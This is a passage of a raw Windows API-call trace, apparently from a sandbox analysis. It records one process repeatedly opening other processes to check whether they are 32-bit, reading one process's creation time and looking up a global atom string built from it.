	[0105.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.542] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.542] CloseHandle (hObject=0x694) returned 1
	[0105.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.543] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.543] CloseHandle (hObject=0x694) returned 1
	[0105.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.543] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.543] CloseHandle (hObject=0x694) returned 1
	[0105.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.543] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.543] CloseHandle (hObject=0x694) returned 1
	[0105.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.543] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.543] CloseHandle (hObject=0x694) returned 1
	[0105.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.544] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.544] CloseHandle (hObject=0x694) returned 1
	[0105.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.544] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.544] CloseHandle (hObject=0x694) returned 1
	[0105.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.544] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.544] CloseHandle (hObject=0x694) returned 1
	[0105.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.544] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.544] CloseHandle (hObject=0x694) returned 1
	[0105.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.545] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.545] CloseHandle (hObject=0x694) returned 1
	[0105.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.545] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.545] CloseHandle (hObject=0x694) returned 1
	[0105.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.545] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.545] CloseHandle (hObject=0x694) returned 1
	[0105.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.545] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.545] CloseHandle (hObject=0x694) returned 1
	[0105.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.545] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.545] CloseHandle (hObject=0x694) returned 1
	[0105.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.546] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.546] CloseHandle (hObject=0x694) returned 1
	[0105.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.546] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.546] CloseHandle (hObject=0x694) returned 1
	[0105.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.546] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.546] CloseHandle (hObject=0x694) returned 1
	[0105.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.546] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.546] CloseHandle (hObject=0x694) returned 1
	[0105.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.546] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.547] CloseHandle (hObject=0x694) returned 1
	[0105.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.547] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.547] CloseHandle (hObject=0x694) returned 1
	[0105.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.547] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.547] CloseHandle (hObject=0x694) returned 1
	[0105.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.547] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.547] CloseHandle (hObject=0x694) returned 1
	[0105.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.547] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.547] CloseHandle (hObject=0x694) returned 1
	[0105.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.548] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.548] CloseHandle (hObject=0x694) returned 1
	[0105.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.548] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.548] CloseHandle (hObject=0x694) returned 1
	[0105.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.548] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.548] CloseHandle (hObject=0x694) returned 1
	[0105.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.548] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.548] CloseHandle (hObject=0x694) returned 1
	[0105.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.548] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.548] CloseHandle (hObject=0x694) returned 1
	[0105.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.549] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.549] CloseHandle (hObject=0x694) returned 1
	[0105.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.549] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.549] CloseHandle (hObject=0x694) returned 1
	[0105.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.549] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.549] CloseHandle (hObject=0x694) returned 1
	[0105.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.549] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.550] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.550] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.550] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.550] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.551] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.551] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.551] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.551] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.551] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.551] CloseHandle (hObject=0x694) returned 1
	[0105.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.551] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.551] CloseHandle (hObject=0x694) returned 1
	[0105.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.552] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.552] CloseHandle (hObject=0x694) returned 1
	[0105.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.552] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.552] CloseHandle (hObject=0x694) returned 1
	[0105.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.586] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.586] CloseHandle (hObject=0x694) returned 1
	[0105.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.587] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.587] CloseHandle (hObject=0x694) returned 1
	[0105.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.587] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.587] CloseHandle (hObject=0x694) returned 1
	[0105.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.587] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.587] CloseHandle (hObject=0x694) returned 1
	[0105.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.587] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.587] CloseHandle (hObject=0x694) returned 1
	[0105.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.588] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.588] CloseHandle (hObject=0x694) returned 1
	[0105.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.588] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.588] CloseHandle (hObject=0x694) returned 1
	[0105.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.588] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.588] CloseHandle (hObject=0x694) returned 1
	[0105.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.588] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.588] CloseHandle (hObject=0x694) returned 1
	[0105.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.588] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.589] CloseHandle (hObject=0x694) returned 1
	[0105.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.589] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.589] CloseHandle (hObject=0x694) returned 1
	[0105.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.589] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.589] CloseHandle (hObject=0x694) returned 1
	[0105.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.589] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.589] CloseHandle (hObject=0x694) returned 1
	[0105.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.590] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.590] CloseHandle (hObject=0x694) returned 1
	[0105.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.590] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.590] CloseHandle (hObject=0x694) returned 1
	[0105.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.590] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.590] CloseHandle (hObject=0x694) returned 1
	[0105.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.590] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.590] CloseHandle (hObject=0x694) returned 1
	[0105.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.591] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.591] CloseHandle (hObject=0x694) returned 1
	[0105.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.591] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.591] CloseHandle (hObject=0x694) returned 1
	[0105.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.591] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.591] CloseHandle (hObject=0x694) returned 1
	[0105.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.591] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.591] CloseHandle (hObject=0x694) returned 1
	[0105.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.591] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.591] CloseHandle (hObject=0x694) returned 1
	[0105.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.592] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.592] CloseHandle (hObject=0x694) returned 1
	[0105.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.592] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.592] CloseHandle (hObject=0x694) returned 1
	[0105.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.592] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.592] CloseHandle (hObject=0x694) returned 1
	[0105.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.592] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.592] CloseHandle (hObject=0x694) returned 1
	[0105.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.592] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.593] CloseHandle (hObject=0x694) returned 1
	[0105.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.593] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.593] CloseHandle (hObject=0x694) returned 1
	[0105.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.593] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.593] CloseHandle (hObject=0x694) returned 1
	[0105.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.593] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.593] CloseHandle (hObject=0x694) returned 1
	[0105.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.593] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.593] CloseHandle (hObject=0x694) returned 1
	[0105.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.594] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.594] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.594] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.594] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.594] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.595] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.595] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.595] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.595] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.595] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.595] CloseHandle (hObject=0x694) returned 1
	[0105.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.595] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.595] CloseHandle (hObject=0x694) returned 1
	[0105.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.596] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.596] CloseHandle (hObject=0x694) returned 1
	[0105.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.596] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.596] CloseHandle (hObject=0x694) returned 1
	[0105.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
